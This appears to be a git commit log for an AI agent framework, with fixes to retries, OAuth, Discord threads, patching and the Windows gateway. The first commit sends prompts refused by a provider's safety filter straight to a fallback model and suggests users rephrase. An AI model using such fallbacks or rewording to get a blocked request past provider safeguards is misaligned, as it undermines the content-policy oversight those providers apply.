kshitij	0554ef1aa3	fix(agent): fallback immediately on provider content-policy blocks (#33883 ) * fix(agent): fallback immediately on provider content-policy blocks Provider safety-filter refusals (e.g. OpenAI Codex 'flagged for possible cybersecurity risk', OpenAI moderation 'violates our usage policies', Anthropic safety-system rejections, Azure content_filter) are deterministic decisions about a specific prompt. Retrying the same prompt up to api_max_retries times just reproduces the same refusal and burns paid attempts before surfacing the generic 'API failed after 3 retries — <provider message>' to Telegram / cron with no indication that the failure came from the model provider rather than Hermes itself. Classify these as a new FailoverReason.content_policy_blocked (non-retryable, should_fallback=True) and route them through the existing is_client_error path so the loop: - skips the 3x retry backoff - activates a configured fallback model immediately - emits a clear provider-safety message to the user (not the generic 'Non-retryable error (HTTP None)') and surfaces actionable guidance when no fallback is configured (rephrase, narrow context, or set fallback_model in hermes config) - returns a final_response that explicitly tells the user this came from the model provider, so gateway delivery is unambiguous and cron last_status reflects the safety block rather than a vague 'agent reported failure' Patterns are intentionally narrow — verbatim refusal phrasings keyed to specific provider safety pipelines, not generic words like 'policy' or 'violation' that would collide with billing / format / auth errors. Regression guards in test_18028_content_policy_blocked.py verify billing 402s, generic 400s, and OpenRouter account-level provider_policy_blocked remain distinct classifications. 
Salvaged from #18164 onto current main (file restructure: loop logic moved from run_agent.py to agent/conversation_loop.py, _emit_status → _buffer_status), broadened patterns beyond the original OpenAI Codex cybersecurity case to cover OpenAI moderation, Anthropic safety system, and Azure content_filter; added user-actionable guidance and a clear final_response so cron/gateway surfaces the policy block instead of a generic non-retryable error, and added a regression-guard test module mirroring the is_client_error predicate. Addresses #18028. Co-authored-by: Kuan-Chieh Huang <kchuang1015@users.noreply.github.com> * chore: add kchuang1015 to AUTHOR_MAP --------- Co-authored-by: Kuan-Chieh Huang <kchuang1015@users.noreply.github.com>	2026-05-28 07:28:24 -07:00
kshitij	a82c88bac0	fix(xai-oauth): accept bare-code manual paste (state=None) (#26923 ) (#33880 ) xAI's consent page renders the authorization code in-page rather than redirecting through the 127.0.0.1 callback, so on remote/headless setups (GCP Cloud Shell, Codespaces, container consoles, headless VPS) the only value the user can paste is the opaque code with no `code=`/`state=` query parameters. `_parse_pasted_callback` correctly returns `state=None` for that input, but `_xai_oauth_loopback_login` then validated state unconditionally and raised `xai_state_mismatch`, making the documented bare-code paste path unreachable. PKCE (code_verifier) still binds the token exchange to this client, so the local state-equality check is redundant when there is no state to compare. On the manual-paste path only, substitute the locally generated state when the callback returned none — the rest of the validation chain (code presence, error field, token exchange) is unchanged. The loopback HTTP-server path still requires a matching state (a real browser redirect always carries one). Also: clarify the manual-paste prompt to mention xAI's in-page code rendering so users know pasting the bare code on its own is expected. Root-cause analysis from #26923 comment by @AccursedGalaxy (2026-05-20). Tests ----- * test_xai_loopback_login_manual_paste_bare_code_succeeds — positive end-to-end through the token exchange with state=None. * test_xai_loopback_login_loopback_path_rejects_missing_state — the HTTP-server path still rejects state=None as a regression guard (the bare-code relaxation must NOT widen the loopback path). * Existing test_xai_loopback_login_manual_paste_state_mismatch_raises continues to verify wrong (non-None) state is rejected on manual-paste. Closes #26923.	2026-05-28 05:47:30 -07:00
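The state handling described in a82c88bac0 can be sketched roughly as follows. This is an illustration only, not the repository's code: `resolve_callback_state` and its parameters are hypothetical names, and `ValueError` stands in for whatever exception type `_xai_oauth_loopback_login` actually raises.

```python
from typing import Optional


def resolve_callback_state(
    returned_state: Optional[str],
    expected_state: str,
    manual_paste: bool,
) -> str:
    """Return the state to validate against, or raise on mismatch.

    Hypothetical helper: on the manual-paste path a bare code carries no
    state, so the locally generated one is substituted. PKCE still binds
    the token exchange to this client.
    """
    if returned_state is None and manual_paste:
        return expected_state
    # The loopback HTTP-server path, and any non-None pasted state, must match.
    if returned_state != expected_state:
        raise ValueError("xai_state_mismatch")
    return returned_state
```

The relaxation applies only when both conditions hold (no state and manual paste), so a missing state on the loopback path and a wrong state on either path are still rejected.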
helix4u	c0d04694ea	docs(email): clarify gateway vs Himalaya setup	2026-05-28 05:42:09 -07:00
Teknium	67011cc0d7	feat(agent): buffer retry/fallback status, surface only on terminal failure (#33816 ) Users report that the CLI/gateway floods them with confusing retry chatter during transient failures: a single 429 can produce 10+ "Provider/Endpoint/ Retrying in 5s..." lines before the request eventually succeeds. The same firehose hits Telegram, Discord, Slack, etc. via _emit_status. This patch defers all retry/fallback/compression status messages until we know the outcome: - if the turn ultimately succeeds (any path: primary recovers, fallback activates, compression unsticks the request), the buffer is silently dropped — the user sees nothing. - if every retry and fallback exhausts and the turn fails, the buffer is flushed at the terminal-failure return so the user sees the full retry trace alongside the final error. Backend logging (agent.log) is unchanged — every emission site still writes to logger.warning/info, so post-mortem diagnosis is intact. ## What changed run_agent.py: four new methods on AIAgent: _buffer_status(msg) — defer an _emit_status call _buffer_vprint(msg) — defer a _vprint(force=True) line _clear_status_buffer() — drop pending messages on success _flush_status_buffer() — replay pending messages on terminal failure agent/conversation_loop.py: - converted ~30 mid-process emit/vprint sites in the retry, fallback, compression, empty-response, and stream-watchdog paths to the buffered helpers - added _flush_status_buffer() at every terminal-failure return so users still see the trace when it actually matters - added _clear_status_buffer() at the "non-empty assistant content" point (NOT at "API call returned bytes" — empty responses still loop through the empty-retry path and would otherwise lose their trace between iterations) - silenced the two "(´;ω;`) oops, retrying..." / "(╥_╥) error, retrying..." 
spinner final-frame messages — the spinner now stops cleanly so retries leave no visible residue agent/chat_completion_helpers.py: same conversion for codex TTFB / stale- stream / fallback-activation status messages. agent/stream_diag.py: _emit_stream_drop now buffers instead of emitting directly. ## Tests tests/run_agent/test_retry_status_buffer.py: 7 unit tests covering accumulate→flush, clear-on-success, mixed kinds, empty-buffer no-op, re-buffer after flush, exception swallowing. Updated 3 existing tests that mocked _emit_status to also mock (or use) _buffer_status: - tests/run_agent/test_run_agent.py::test_empty_response_emits_status_for_gateway - tests/run_agent/test_stream_drop_logging.py (2 tests) - tests/agent/test_codex_ttfb_watchdog.py (TTFB hint test) ## Validation Live test: hermes chat -q against an unreachable endpoint with no fallback exhausts retries and prints the full trace at the end. Same flow against a working endpoint prints zero retry chatter.	2026-05-28 04:53:27 -07:00
Teknium	e0572a6def	fix(skills-hub): stop ellipsis-truncating the Identifier column (#33810) `hermes skills search` rendered the Identifier column with the default overflow behaviour, so long slugs (notably browse-sh, where every skill ends in a `-XXXXXX` hash that's part of the identifier) were cut to `browse-sh/weathe…`. Users copied the visible string into `hermes skills install` and got a not-found error because the hash was gone. Set overflow="fold" on the Identifier column in both search tables (`do_search` and the `_resolve_short_name` multi-match table) so long slugs wrap onto a second line instead of getting eaten. Also add a `--json` flag to `hermes skills search` (and the `/skills search` slash variant) for scripting: it emits a list of {name, identifier, source, trust_level, description} objects with the full identifier, which is the right shape for copy-paste pipelines too. Closes #33674.	2026-05-28 04:53:13 -07:00
Teknium	5e1f793430	chore(web): remove web_crawl tool + provider crawl plumbing (#33824 ) The web_crawl_tool() function was an orphan — no model schema registered it, no skill or CLI command called it, and the agent had no way to invoke it. PR #32608 proposed wiring it up as a model-callable tool; we've decided not to expose crawl as a separate capability since web_search + web_extract cover the use cases we want models to have. Removed: - tools/web_tools.py: web_crawl_tool() (~230 LOC) - plugins/web/firecrawl/provider.py: supports_crawl() + crawl() - plugins/web/tavily/provider.py: supports_crawl() + crawl() - plugins/web/xai/provider.py: supports_crawl() override - agent/web_search_provider.py: supports_crawl() + crawl() ABC methods - agent/web_search_registry.py: get_active_crawl_provider() + the 'crawl' branch in _resolve() - agent/display.py: web_crawl tool-progress rendering - hermes_cli/config.py: 'web_crawl' from TAVILY_API_KEY.tools - tools/website_policy.py: stale comment reference - Tests: removed TestWebCrawlTavily class, the two website-policy web_crawl tests, the searxng/ddgs/brave-free crawl-error tests, the integration test_web_crawl method, and the test_unconfigured_crawl_emits_top_level_error test. Trimmed the capability-flag parametrize list and the WebSearchProvider ABC conformance tests. - Docs: trimmed the Crawl column from capability tables in both EN and zh-Hans, updated the developer-guide ABC table. Net: 25 files, +115/-1067. Closes #33762 (the schema-text bug only existed if #32608 landed). Supersedes #32608.	2026-05-28 04:52:42 -07:00
teknium1	b243afb68b	fix(discord): skip backfill for auto-created threads and update test fakes When auto-threading kicked in, the broadened backfill gate ran on the freshly-created thread — but the thread has no prior context to fetch, and the parent-channel reference passed to _fetch_channel_context would have leaked unrelated context (see #31467). Skip backfill when auto_threaded_channel is set. Also teach the _FakeTextChannel / _FakeThreadChannel test doubles to expose a no-op history() async generator so the broadened gate doesn't trip AttributeError → discord.Forbidden (MagicMock) → TypeError in the existing auto-thread tests. Add a regression test that asserts auto-threaded messages do not trigger backfill.	2026-05-28 04:52:02 -07:00
teknium1	68ddd6b338	refactor(discord): inline backfill gate and document intent Drop the _needed_mention local variable now that it has only one use, inline its expression as _has_mention_gap, and add a comment explaining the three backfill cases (mention-gated channel, thread, DM skip). Behaviorally identical to the prior commit; cleanup only. Co-authored-by: liuhao1024 <liuhao1024@users.noreply.github.com>	2026-05-28 04:52:02 -07:00
Pluviobyte	eafe11d456	fix(gateway): backfill Discord thread context Discord threads where the bot has already participated bypass mention gating by default, but the backfill check was still tied to the mention-needed condition. That meant follow-up thread messages could trigger a response without providing recent thread history to the session. Run history backfill for thread messages whenever backfill is enabled, while keeping DMs skipped and channel mention backfill behavior unchanged. Add a regression test for a known thread follow-up without an explicit mention. Fixes #33666 Co-authored-by: Cursor <cursoragent@cursor.com>	2026-05-28 04:52:02 -07:00
Teknium	a1eaad2fc0	perf(skills-page): lazy-fetch the catalog instead of bundling 34MB into JS (#33809)
PR #33748 grew the live skills index from ~2k skills to ~69k, which made the previous build-time bundling strategy untenable: the skills page's JS chunk was about to balloon from ~1MB to ~35MB. Initial page load on mobile became unusable, search lagged on every keystroke against the 68k-item array, and JSON.parse blocked the main thread at startup.
Three changes:
1. extract-skills.py writes skills.json + skills-meta.json into website/static/api/ instead of website/src/data/. Static-served by Vercel as /docs/api/skills.json (gzipped on the wire), same CDN that already serves skills-index.json.
2. skills/index.tsx drops the static import and fetches both files in parallel on mount. Loading state shows '…' for the count; failures surface a small error pill instead of blanking the page.
3. Search is debounced 150ms and runs against a precomputed lowercase haystack stamped onto each row at load time. Before: array-join + toLowerCase per row per keystroke on a 68k array. After: single .includes() per row, deferred until typing settles.
Validation:
| | before | after |
|---|---|---|
| skills.json location | src/data/ (bundled) | static/api/ (CDN) |
| Largest JS chunk | would be ~35MB at 68k skills | 659 KB |
| Initial page render | wait for full parse | immediate, fetch async |
| Per-keystroke filter | join+lowercase x 68k rows | single includes x 68k rows |
| Debounce | none | 150ms |
Built locally for both en and zh-Hans locales; the 34MB skills.json now lives in build/api/ and is served separately rather than inlined into the page's bundle. skills.json and skills-meta.json added to .gitignore; they were already build artifacts, but the gitignore only listed skills-index.json before.	2026-05-28 03:41:43 -07:00
teknium1	6f9182cb34	fix(kanban): content-addressed corrupt-DB backup filename Repeated quarantines of an unchanged corrupt kanban.db used to amplify disk usage by N: the gateway dispatcher's 5-minute retry loop, multi- profile fleets sharing one DB, and manual reopen attempts each produced a fresh '.corrupt.<timestamp>.bak' copy of the same bytes. After 10 retries on a 100KB DB you had 11x the disk footprint of duplicate corrupt data. Derive the backup filename from a sha256 of the main DB instead of a timestamp + collision counter. Same bytes → same filename → skip the copy on retries. Different bytes (partial repair, further damage) → different filename → preserve separately. Sidecar (-wal/-shm) backups inherit the same content-addressed name. Inspired by @hanzckernel's PR #33529, simplified down to ~30 LOC: drop the persistent JSON marker file, drop the atomic temp+fsync+rename helper (shutil.copy2 is fine for a quarantine-only path), drop the gateway-side WAL/SHM fingerprint extension (the existing (path, mtime, size) tuple still gives the 5-minute retry semantics it needs), and drop the gateway-side helper extraction. The backup file existing IS the marker; no separate state needed. Test: tests/hermes_cli/test_kanban_db.py::test_repeated_corrupt_open_reuses_single_backup proves 10 retries on the same corrupt bytes produce 1 backup (was 11), and mutating the corrupt bytes produces a second backup with a different fingerprint. Refs #33529 Co-authored-by: hanzckernel <zhicheng.han@mathematik.uni-goettingen.de>	2026-05-28 03:38:09 -07:00
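A minimal sketch of the content-addressed quarantine idea from 6f9182cb34, under stated assumptions: `quarantine_corrupt_db`, the 16-character digest prefix, and the `.corrupt.<digest>.bak` suffix are illustrative choices, not the names or format used in the repository. Sidecar (-wal/-shm) handling is omitted.

```python
import hashlib
import shutil
from pathlib import Path


def quarantine_corrupt_db(db_path: Path) -> Path:
    """Copy a corrupt DB to a backup whose name is derived from its bytes.

    Hypothetical helper. Same bytes give the same filename, so repeated
    quarantines of an unchanged file skip the copy.
    """
    # Reads the whole file into memory; acceptable for a small DB in a sketch.
    digest = hashlib.sha256(db_path.read_bytes()).hexdigest()[:16]
    backup = db_path.with_name(f"{db_path.name}.corrupt.{digest}.bak")
    if not backup.exists():
        # The existing backup file acts as the marker; no separate state needed.
        shutil.copy2(db_path, backup)
    return backup
```

Calling this ten times on unchanged bytes leaves one backup on disk; changing the bytes yields a second backup under a different name, which matches the behaviour the commit's test describes.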
Teknium	432a691758	fix(update): stream + idle-kill `npm run build` so a stalled webui-build can't soft-brick the install (#33803 ) `hermes update` ran the webui build with `capture_output=True` and no timeout. On low-memory hosts (WSL2's 4 GB default, small VPSes, antivirus stalls) Vite goes silent for minutes; users see a frozen terminal, decide the update is hung, and reboot. The reboot lands after `pip install -e .` has already touched the install but before the build completes, leaving the `hermes` launcher in place while `hermes_cli` is no longer importable — i.e. `ModuleNotFoundError: No module named 'hermes_cli'` (#33788, same class as #32384). Changes: - New `_run_with_idle_timeout()` helper: streams subprocess output line-by-line (so the user sees Vite progress in real time) and kills the process if no bytes appear on stdout/stderr for 180s. The existing stale-dist fallback (#23817) then serves the previous build instead of failing the update. - `_build_web_ui()` uses the helper for `npm run build` (the actual stall site). `npm install` keeps `subprocess.run` + capture_output to preserve the existing EPERM-retry-on-Windows contract. - Both `cmd_update` call sites print `→ Core update complete. Building dashboard (optional)...` before the webui build. The CLI is fully functional at this point; a webui-build failure only affects `hermes dashboard`. Telegraphing the boundary explicitly stops users from rebooting through the build step. Tests: - `tests/hermes_cli/test_run_with_idle_timeout.py` — 4 tests covering streaming success, nonzero exit, idle-kill, and missing-binary cases. Uses real `subprocess.Popen` on tiny Python scripts; isolated in its own file so per-file canonical-runner parallelism doesn't pair it with the mock-heavy tests. - `tests/hermes_cli/test_web_ui_build.py` — updated existing tests to patch `_run_with_idle_timeout` for the build step in addition to `subprocess.run` for the install step. 
- `tests/hermes_cli/test_cmd_update.py::test_update_refreshes_repo_and_tui_node_dependencies` — same update. Full suite: `scripts/run_tests.sh tests/hermes_cli/` → 5646 passed, 0 failed. Fixes #33788.	2026-05-28 03:34:47 -07:00
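The stream-and-idle-kill behaviour described in 432a691758 could look something like the sketch below. It is not the repository's `_run_with_idle_timeout()`: the function name, return shape, and polling interval are assumptions. It also tracks complete lines rather than raw bytes and does not handle a missing binary, both of which are simplifications.

```python
import subprocess
import sys
import threading
import time


def run_with_idle_timeout(cmd, idle_timeout=180.0):
    """Run cmd, echo its output live, and kill it after idle_timeout seconds of silence.

    Hypothetical sketch. Returns (returncode, timed_out, lines).
    """
    proc = subprocess.Popen(
        cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, text=True
    )
    last_output = [time.monotonic()]
    lines = []

    def pump():
        # Reader thread: forward each line and record when it arrived.
        for line in proc.stdout:
            last_output[0] = time.monotonic()
            lines.append(line)
            sys.stdout.write(line)

    reader = threading.Thread(target=pump, daemon=True)
    reader.start()

    timed_out = False
    while proc.poll() is None:
        if time.monotonic() - last_output[0] > idle_timeout:
            proc.kill()  # no output for too long: treat the build as stalled
            timed_out = True
            break
        time.sleep(0.05)

    proc.wait()
    reader.join(timeout=5.0)
    return proc.returncode, timed_out, lines
```

A caller can then fall back to a previous build when `timed_out` is true instead of failing the whole update, which is the role the commit assigns to the existing stale-dist fallback.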
teknium1	78be458608	fix(patch): widen new_string \t/\r unescape to all match strategies (#33733 ) Extends @liuhao1024's escape-normalized fix so the patch tool also recovers when old_string carries a real tab byte and matches via the `exact` strategy — which is the headline reproduction in the issue and the most common case in practice (LLMs frequently get old_string right because they re-read the file, but still serialize new_string's tabs as two-character `\t`). Instead of gating on the match strategy, decide per-sequence by looking at the matched region of the file: only convert `\t` -> tab and `\r` -> CR when the file region we're replacing actually contains the corresponding control byte. That mirrors the region-based heuristic in `_detect_escape_drift` and keeps legitimate writes of the literal two-character string `"\t"` (e.g. patching `sep = "\t"` in Python source) untouched — those files have a backslash+t in the matched region, not a real tab, so new_string passes through verbatim. `\n` is still excluded because newlines serialize correctly through JSON and unescaping would corrupt source escape sequences far more often than help. E2E verified against the live `patch` tool: tab-indented file + literal `\t` in new_string under both `exact` (Variant 1) and `escape_normalized` (Variant 2) strategies now produces real tab bytes; a Python source line containing `sep = "\t"` (legitimate literal backslash-t) survives a patch unchanged. Tests updated to cover both strategies and the legitimate-literal case, and to assert that `\n` is intentionally preserved. Refs #33733	2026-05-28 03:27:20 -07:00
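The region-based decision in 78be458608 can be illustrated with a short sketch. `unescape_for_region` is a hypothetical name, and the plain `str.replace` calls are a simplification: unlike a careful implementation, they would also rewrite the `\t` inside an escaped backslash pair such as `\\t`.

```python
def unescape_for_region(new_string: str, matched_region: str) -> str:
    """Convert literal backslash-t / backslash-r in new_string to control bytes,
    but only when the file region being replaced contains that control byte.

    Hypothetical helper illustrating the per-sequence heuristic.
    """
    result = new_string
    if "\t" in matched_region:
        result = result.replace("\\t", "\t")
    if "\r" in matched_region:
        result = result.replace("\\r", "\r")
    # Backslash-n is deliberately left alone, as the commit message explains.
    return result
```

With a tab-indented region, a two-character `\t` in `new_string` becomes a real tab; with a region that contains the literal text `sep = "\t"` and no tab byte, `new_string` passes through verbatim.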
liuhao1024	e9f3f2b34a	fix(tools): unescape common sequences in new_string when escape_normalized matches When the patch tool matches via the escape_normalized strategy, old_string contains literal \t, \n, \r sequences that get unescaped to match real control characters in the file. However, new_string was written as-is, leaving literal backslash sequences in the output. Add _unescape_common_sequences() helper and apply it to new_string when the matching strategy is escape_normalized. This ensures LLM-generated tab/newline sequences become real bytes in the patched file. Fixes #33733	2026-05-28 03:27:20 -07:00
Teknium	10ee4a729b	fix(gateway): drain on Windows `hermes gateway stop` so sessions survive restart (#33798 ) Sessions now survive `hermes gateway stop` / `restart` on native Windows. Previously the gateway died on schtasks `/End` + os.kill SIGTERM without ever running the drain loop, so the v0.13.0 session-resume feature (#21192) silently broke on Windows: `resume_pending=True` was never written, and the next boot started with a blank conversation history (issue #33778). Root cause is twofold and the reporter only identified half of it: 1. `hermes_cli/gateway_windows.py::stop()` did not write the `planned_stop_marker` before signalling. The reporter caught this. 2. The bigger reason: `asyncio.add_signal_handler` raises NotImplementedError for SIGTERM/SIGINT on Windows, so even if the marker had been written, the gateway's existing SIGTERM handler (which is what calls `runner.stop()` and the `mark_resume_pending` loop) was never invoked. Writing the marker would have been necessary-but-insufficient. The fix has two parts: * gateway/run.py: new `_run_planned_stop_watcher` daemon thread polls for the planned-stop marker file every 0.5s. When the marker appears it `loop.call_soon_threadsafe(shutdown_signal_handler, None)` — the same shutdown path a real SIGTERM would have driven, including the pre-drain `mark_resume_pending` writes (run.py:5977) and graceful drain wait. The existing signal handler already accepts `received_signal=None` and falls through to `consume_planned_stop_marker_for_self()`, so no handler changes needed. Runs on every platform as cheap belt-and-suspenders. * hermes_cli/gateway_windows.py: `stop()` now writes the marker for the running gateway PID and waits up to `agent.restart_drain_timeout` (default 30s) for the PID to exit cleanly. On clean drain, the kill sweep is non-forceful; on timeout, escalates to `kill_gateway_processes(force=True)` which routes to taskkill /T /F per `references/windows-native-support.md`. 
Validation: * 7 new tests in tests/gateway/test_planned_stop_watcher.py covering: marker→handler dispatch, no-marker idle, already-draining skip, not-yet-running skip, stop_event responsiveness, fire-once semantics, error tolerance. * 8 new tests in tests/hermes_cli/test_gateway_windows.py covering: marker-before-kill ordering, clean-drain skips force-kill, drain-timeout escalates to force=True, no-pid-skips-drain, invalid-pid handling, fast-exit success, timeout failure, marker-write-failure tolerance. * E2E (Linux, detached orphan): write_planned_stop_marker(pid) + `_drain_gateway_pid(pid, 5.0)` returns True in 0.5s after the victim sees the marker and exits. Tested with a double-forked subprocess so the test parent isn't holding it as a zombie. * Targeted: tests/gateway/{restart_drain,restart_resume_pending, signal,signal_format,status,shutdown_forensics,approve_deny_commands, planned_stop_watcher} + tests/hermes_cli/{gateway_windows, gateway_service} → 519/519. What was wrong with the reporter's claim (for future archaeology): they described the symptom as "no `resume_pending=True` written to `sessions.json`" — but Hermes uses `state.db` (SQLite), not `sessions.json`, and `mark_resume_pending` is called regardless of the marker (the marker only affects exit code 0 vs 1 for systemd revival semantics). The real session-loss path is the missing drain on Windows, not a missing marker. Both halves are fixed here. Closes #33778.	2026-05-28 03:25:32 -07:00
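The marker-file watcher from 10ee4a729b can be sketched as below. This is an assumption-laden illustration rather than the code in gateway/run.py: `start_marker_watcher`, its parameters, and the marker path are hypothetical. The only parts taken from the commit message are the polling loop, the 0.5s interval, the `loop.call_soon_threadsafe(handler, None)` hand-off, and the fire-once behaviour.

```python
import asyncio
import threading
from pathlib import Path


def start_marker_watcher(loop, marker: Path, on_stop, stop_event, interval=0.5):
    """Poll for a marker file from a daemon thread and hand off to the event loop.

    Hypothetical sketch. on_stop is called once, on the loop's thread, with
    None in place of a signal number.
    """

    def watch():
        # Event.wait returns True once stop_event is set, which ends the loop.
        while not stop_event.wait(interval):
            if marker.exists():
                loop.call_soon_threadsafe(on_stop, None)
                return  # fire once, then exit the thread

    thread = threading.Thread(target=watch, daemon=True)
    thread.start()
    return thread
```

Because the callback is scheduled with `call_soon_threadsafe`, the shutdown handler runs on the event loop thread just as a signal handler registered with the loop would, which is why this approach works on Windows where `add_signal_handler` is unavailable.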
teknium1	f8896dedc8	chore(release): map biser@bisko.be -> bisko in AUTHOR_MAP	2026-05-28 03:21:00 -07:00
Biser Perchinkov	b5495db701	fix(agent): re-pad reasoning_content on cross-provider fallback to require-side providers api_messages is built once before the retry loop while the primary provider is active. When a mid-conversation fallback switches to a require-side thinking provider (DeepSeek/Kimi/MiMo), assistant turns built under a non-require primary (e.g. Codex) go out without reasoning_content and the new provider rejects the request with HTTP 400 ("reasoning_content must be passed back"). Re-apply the echo-back pad against the current provider immediately before building the request kwargs. Idempotent and a no-op unless the active provider enforces echo-back, so it covers all fallback paths without affecting normal or reject-side operation. Drafted by Claude (Opus 4.7) under human review while fixing a personal deployment. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>	2026-05-28 03:21:00 -07:00
Indigo Karasu	9179396cb7	fix(stream-consumer): only set _final_content_delivered when final response confirmed delivered In GatewayStreamConsumer._run(), _final_content_delivered was set to True based on the success of a mid-stream finalize edit, before the final finalize edit was attempted. When the final edit later failed (Telegram flood control, retry-after), _final_response_sent stayed False but _final_content_delivered was already True, so gateway/run.py suppressed its normal final send and the user saw a partial / fallback message instead of the real answer. Changes in gateway/stream_consumer.py: - Remove the premature _final_content_delivered = True at the top of the got_done block. - Set _final_content_delivered = True only when the actual final send / edit succeeds, in each finalize branch (no-finalize adapter, _message_id finalize, no-_already_sent send). - _send_fallback_final: don't set _final_response_sent = True when only some chunks were delivered; the gateway should still attempt a complete final send. Set _final_content_delivered = True alongside _final_response_sent on the success path and short-text path. - Cancellation handler: set _final_content_delivered = True alongside _final_response_sent when the best-effort final edit succeeds. Adds TestFinalContentDeliveredGuard with 3 regression tests covering the core bug scenario, the happy path, and partial fallback. Closes #33708 Closes #25010 Refs #29200 Co-authored-by: Teknium <127238744+teknium1@users.noreply.github.com>	2026-05-28 03:15:19 -07:00
Dusk1e	a91b1c8b31	fix(tirith): reject non-regular tar members during auto-install process	2026-05-28 02:49:26 -07:00

9818 commits